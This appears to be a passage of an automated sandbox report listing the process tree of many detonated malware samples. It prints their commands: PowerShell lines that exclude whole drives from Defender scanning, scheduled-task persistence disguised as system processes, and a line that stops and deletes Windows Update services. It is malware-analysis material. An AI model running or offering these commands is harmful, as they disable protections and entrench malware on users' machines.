- Suspicious use of SetWindowsHookEx
PID:2316

C:\Users\Admin\Desktop\malware\APP PW 2023\install application.exe
"C:\Users\Admin\Desktop\malware\APP PW 2023\install application.exe"
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2400

C:\INSTALLER\IFOGKVBUZB.exe
C:\INSTALLER\IFOGKVBUZB.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2556

C:\INSTALLER\NMNEXHSZTR.exe
C:\INSTALLER\NMNEXHSZTR.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1540 -s 1104
3⤵
PID:2676

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://cliclsoft.click/install
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:888

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:888 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2752

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\b49d25fc-daac-4140-aa16-0ee05784fada" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:3744

C:\Users\Admin\Desktop\malware\Bandicam 5.0.2.1813 incl keygen..By Faizan\bdcamsetup.exe
"C:\Users\Admin\Desktop\malware\Bandicam 5.0.2.1813 incl keygen..By Faizan\bdcamsetup.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2884

C:\Users\Admin\AppData\Local\Temp\BDMPEG1SETUP.EXE
"C:\Users\Admin\AppData\Local\Temp\BDMPEG1SETUP.EXE" /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" /s "C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll"
4⤵
- Registers COM server for autorun
- Modifies registry class
PID:2228

C:\Program Files (x86)\Bandicam\bdcam.exe
"C:\Program Files (x86)\Bandicam\bdcam.exe" /install
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1860

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Program Files (x86)\Bandicam\bdcamvk64.dll",RegDll
3⤵
PID:476

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Program Files (x86)\Bandicam\bdcamvk32.dll",RegDll
3⤵
PID:528

C:\Program Files (x86)\Bandicam\bdcam.exe
"C:\Program Files (x86)\Bandicam\bdcam.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2856

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.bandicam.com/f.php?id=eng_app_complete_install&v=2&lang=en
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2372

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2372 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:960

C:\Users\Admin\Desktop\malware\Use_1234_As_PassCode_Setup\Full_Setup_Activated.exe
"C:\Users\Admin\Desktop\malware\Use_1234_As_PassCode_Setup\Full_Setup_Activated.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath C:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:1240

C:\Users\Admin\Desktop\malware\6523.exe
"C:\Users\Admin\Desktop\malware\6523.exe"
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:884

C:\Users\Admin\Desktop\malware\Amdau.exe
"C:\Users\Admin\Desktop\malware\Amdau.exe"
1⤵
- Executes dropped EXE
PID:2576

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
2⤵
PID:1584

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000058061\so64x.dll, rundll
3⤵
PID:1808

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000058061\so64x.dll, rundll
4⤵
PID:1784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:2484

C:\Users\Admin\Desktop\malware\bebra.exe
"C:\Users\Admin\Desktop\malware\bebra.exe"
1⤵
- Executes dropped EXE
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Desktop\malware\bebra.exe
2⤵
PID:2056

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
3⤵
PID:2520

C:\Users\Admin\Desktop\malware\build3.exe
"C:\Users\Admin\Desktop\malware\build3.exe"
1⤵
- Executes dropped EXE
PID:1980

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
2⤵
- Creates scheduled task(s)
PID:2272

C:\Users\Admin\Desktop\malware\DCKA.exe
"C:\Users\Admin\Desktop\malware\DCKA.exe"
1⤵
- Executes dropped EXE
PID:2852

C:\Users\Admin\Desktop\malware\CLEP.exe
"C:\Users\Admin\Desktop\malware\CLEP.exe"
1⤵
- Executes dropped EXE
PID:2416

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C schtasks /create /tn FWDCznNyRu /tr C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
2⤵
PID:2860

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn FWDCznNyRu /tr C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
3⤵
- Creates scheduled task(s)
PID:2220

C:\Users\Admin\Desktop\malware\CLEP.exe
"C:\Users\Admin\Desktop\malware\CLEP.exe"
1⤵
PID:1960

C:\Users\Admin\Desktop\malware\desktopditor.exe
"C:\Users\Admin\Desktop\malware\desktopditor.exe"
1⤵
- Executes dropped EXE
PID:2008

C:\Users\Admin\Desktop\malware\DEV.exe
"C:\Users\Admin\Desktop\malware\DEV.exe"
1⤵
PID:1660

C:\Users\Admin\Desktop\malware\devalt.exe
"C:\Users\Admin\Desktop\malware\devalt.exe"
1⤵
- Executes dropped EXE
PID:2004

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\agentBrowsersavesRefBroker\metokn3Gpa5i.vbe"
2⤵
PID:2728

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\agentBrowsersavesRefBroker\DYj6G9.bat" "
3⤵
PID:1872

C:\agentBrowsersavesRefBroker\SurrogateDll.exe
"C:\agentBrowsersavesRefBroker\SurrogateDll.exe"
4⤵
PID:596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
5⤵
PID:2028

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
5⤵
- Executes dropped EXE
PID:1960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
5⤵
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/agentBrowsersavesRefBroker/'
5⤵
PID:2680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
5⤵
PID:2220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
5⤵
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
5⤵
PID:1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
5⤵
PID:1860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
5⤵
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
5⤵
PID:2960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
5⤵
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
5⤵
PID:2436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
5⤵
PID:824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/INSTALLER/'
5⤵
PID:2884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2OM6vZgrdE.bat"
5⤵
PID:1324

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
6⤵
PID:1616

C:\Users\Public\Pictures\Sample Pictures\WmiPrvSE.exe
"C:\Users\Public\Pictures\Sample Pictures\WmiPrvSE.exe"
6⤵
PID:780

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c0f791a4-09a5-420d-9055-f416371fe5e8.vbs"
7⤵
PID:3940

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\70403b95-fe8e-4844-a217-be67ecf35045.vbs"
7⤵
PID:2792

C:\Users\Admin\Desktop\malware\DEVMin.exe
"C:\Users\Admin\Desktop\malware\DEVMin.exe"
1⤵
PID:400

C:\Users\Admin\Desktop\malware\DevSt.exe
"C:\Users\Admin\Desktop\malware\DevSt.exe"
1⤵
PID:1948

C:\Users\Admin\Desktop\malware\Documents-EnemyFrauz.exe
"C:\Users\Admin\Desktop\malware\Documents-EnemyFrauz.exe"
1⤵
PID:2868

C:\Users\Admin\Desktop\malware\Documents-EnemyFrauz.exe
"C:\Users\Admin\Desktop\malware\Documents-EnemyFrauz.exe"
2⤵
PID:2080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Documents-EnemyFrauzD" /sc MINUTE /mo 5 /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\Documents-EnemyFrauz.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Documents-EnemyFrauz" /sc ONLOGON /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\Documents-EnemyFrauz.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Documents-EnemyFrauzD" /sc MINUTE /mo 13 /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\Documents-EnemyFrauz.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1344

C:\Users\Admin\Desktop\malware\get3.exe
"C:\Users\Admin\Desktop\malware\get3.exe"
1⤵
PID:1076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
2⤵
PID:2784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Common Files\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files\Common Files\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\INSTALLER\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\INSTALLER\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\INSTALLER\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "licl" /sc MINUTE /mo 13 /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\lic.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lic" /sc ONLOGON /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\lic.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "licl" /sc MINUTE /mo 12 /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\lic.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Pictures\Sample Pictures\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Sample Pictures\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Pictures\Sample Pictures\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DEVMinD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\DEVMin.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DEVMin" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\DEVMin.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DEVMinD" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\DEVMin.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Application Data\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Application Data\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2620

C:\Users\Admin\Desktop\malware\IqXYLXKzl6.exe
"C:\Users\Admin\Desktop\malware\IqXYLXKzl6.exe"
1⤵
PID:1080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "desktopditord" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\desktopditor.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "desktopditor" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\desktopditor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "desktopditord" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\desktopditor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "CLEPC" /sc MINUTE /mo 11 /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\CLEP.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "CLEP" /sc ONLOGON /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\CLEP.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "CLEPC" /sc MINUTE /mo 6 /tr "'C:\Recovery\daa88f22-4899-11ee-869c-62b3d3f2749b\CLEP.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
2⤵
PID:112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1696

C:\Users\Admin\Desktop\malware\LEMON.exe
"C:\Users\Admin\Desktop\malware\LEMON.exe"
1⤵
PID:1580

C:\Users\Admin\Desktop\malware\limalt.exe
"C:\Users\Admin\Desktop\malware\limalt.exe"
1⤵
PID:2776

C:\Users\Admin\Desktop\malware\LIMMin.exe
"C:\Users\Admin\Desktop\malware\LIMMin.exe"
1⤵
PID:1088

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:1380

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:1720

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:1860

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:3040

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:2180

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:1800

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:2584

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:2936

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:268

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:2732

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:788

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:2432

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:2264

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:1176

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:2540

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:2756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#owhqpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
1⤵
PID:2996

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'
2⤵
- Creates scheduled task(s)
PID:2228

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\malware\DEVMin.exe"
1⤵
PID:476

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
2⤵
PID:700

C:\Users\Admin\Desktop\malware\LIMMin.exe
"C:\Users\Admin\Desktop\malware\LIMMin.exe"
1⤵
PID:620

C:\Users\Admin\AppData\Local\Temp\46C1.exe
C:\Users\Admin\AppData\Local\Temp\46C1.exe
1⤵
PID:2480

C:\Users\Admin\AppData\Local\Temp\46C1.exe
C:\Users\Admin\AppData\Local\Temp\46C1.exe
2⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\46C1.exe
"C:\Users\Admin\AppData\Local\Temp\46C1.exe" --Admin IsNotAutoStart IsNotTask
3⤵
PID:3180

C:\Users\Admin\AppData\Local\Temp\46C1.exe
"C:\Users\Admin\AppData\Local\Temp\46C1.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:3776

C:\Users\Admin\AppData\Local\Temp\48B5.exe
C:\Users\Admin\AppData\Local\Temp\48B5.exe
1⤵
PID:2988

C:\Users\Admin\AppData\Local\Temp\4A1D.exe
C:\Users\Admin\AppData\Local\Temp\4A1D.exe
1⤵
PID:1868

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:2948

C:\Users\Admin\AppData\Local\Temp\mi.exe
"C:\Users\Admin\AppData\Local\Temp\mi.exe"
3⤵
PID:848

C:\Users\Admin\AppData\Local\Temp\4E90.exe
C:\Users\Admin\AppData\Local\Temp\4E90.exe
1⤵
PID:632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2428

C:\Users\Admin\Desktop\malware\miner.exe
"C:\Users\Admin\Desktop\malware\miner.exe"
1⤵
PID:2620

C:\Users\Admin\Desktop\malware\LIMSt.exe
"C:\Users\Admin\Desktop\malware\LIMSt.exe"
1⤵
PID:2956

C:\Users\Admin\Desktop\malware\miner.exe
"C:\Users\Admin\Desktop\malware\miner.exe"
1⤵
PID:1112

C:\Users\Admin\Desktop\malware\LK2.exe
